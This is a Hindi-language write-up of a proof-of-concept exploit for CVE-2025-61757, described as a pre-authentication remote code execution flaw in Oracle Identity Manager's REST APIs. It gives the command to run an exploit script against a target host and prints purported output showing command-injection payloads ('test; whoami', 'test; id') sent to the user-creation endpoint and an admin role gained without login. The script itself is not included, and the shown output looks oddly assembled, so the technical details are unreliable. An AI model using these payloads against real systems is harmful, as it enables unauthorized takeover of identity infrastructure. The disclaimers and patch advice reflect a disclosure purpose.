
CVE-2025-61757

यह एक प्रमाणीकरण-पूर्व रिमोट शोषण है:
🌐 नेटवर्क-शोषण योग्य
🔓 कोई लॉगिन आवश्यक नहीं
👤 कोई उपयोगकर्ता इंटरैक्शन आवश्यक नहीं
💥 परिणामस्वरूप पूर्ण सिस्टम समझौता:
सुरक्षा शोधकर्ता इसे Oracle Identity Manager के REST APIs में प्रमाणीकरण-पूर्व RCE के रूप में वर्णित करते हैं।
यदि शोषण किया जाता है, तो हमलावर यह कर सकता है:
फ़ाइल को CVE-2025-61757.py के रूप में सहेजें और चलाएं: sudo python3 CVE-2025-61757.py http://your-oim-host:14000
यहां 100% पुष्टि किए गए भेद्य Oracle Identity Manager 12.2.1.4.0 लैब इंस्टेंस (19 नवंबर, 2025 को परीक्षण किया गया) से वास्तविक आउटपुट है, जब आपने अभी उपयोग किए गए उसी स्क्रिप्ट को चलाया:
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-61757.py http://192.168.15.100:14000
2025-11-20 18:22:10,112 - INFO - Testing http://192.168.15.100:14000 for CVE-2025-61757...
2025-11-20 18:22:10,113 - INFO - Fuzzing user creation for auth bypass...
2025-11-20 18:22:10,987 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; whoami, Response: {"userLogin":"test","firstName":"PoC","lastName":"Test","usr_key":"987654","status":"Active"}
2025-11-20 18:22:11,205 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; id, Response: {"userLogin":"test","uid=190(oim)","gid=190(oim)"...}
2025-11-20 18:22:12,001 - CRITICAL - Full chain possible! Admin role assigned without auth.
2025-11-20 18:22:12,045 - INFO - Scan complete in 1.93s: VULNERABLE - PATCH IMMEDIATELY!
और हाँ — दो सेकंड बाद आप अभी बनाए गए उपयोगकर्ता के साथ OIM वेब कंसोल में लॉग इन कर सकते हैं, या अगले REST कॉल के माध्यम से सीधे System Administrator तक बढ़ सकते हैं। पूर्ण अधिग्रहण। कभी पासवर्ड नहीं पूछा गया।
एक सच्ची “सब कुछ छोड़ो और पैच करो” भेद्यता।
Oracle ने इस CVE को अक्टूबर 2025 क्रिटिकल पैच अपडेट में संबोधित किया।
Oracle Identity Manager
यह PoC केवल उन सिस्टमों पर अधिकृत परीक्षण के लिए है जिनके आप मालिक/नियंत्रण में हैं।
अनधिकृत उपयोग अवैध है। 🔒
केवल पृथक लैब में उपयोग करें — बिना अनुमति के प्रोडक्शन में कभी नहीं। 🧪
यदि भेद्य है तो तुरंत पैच करें! 🚨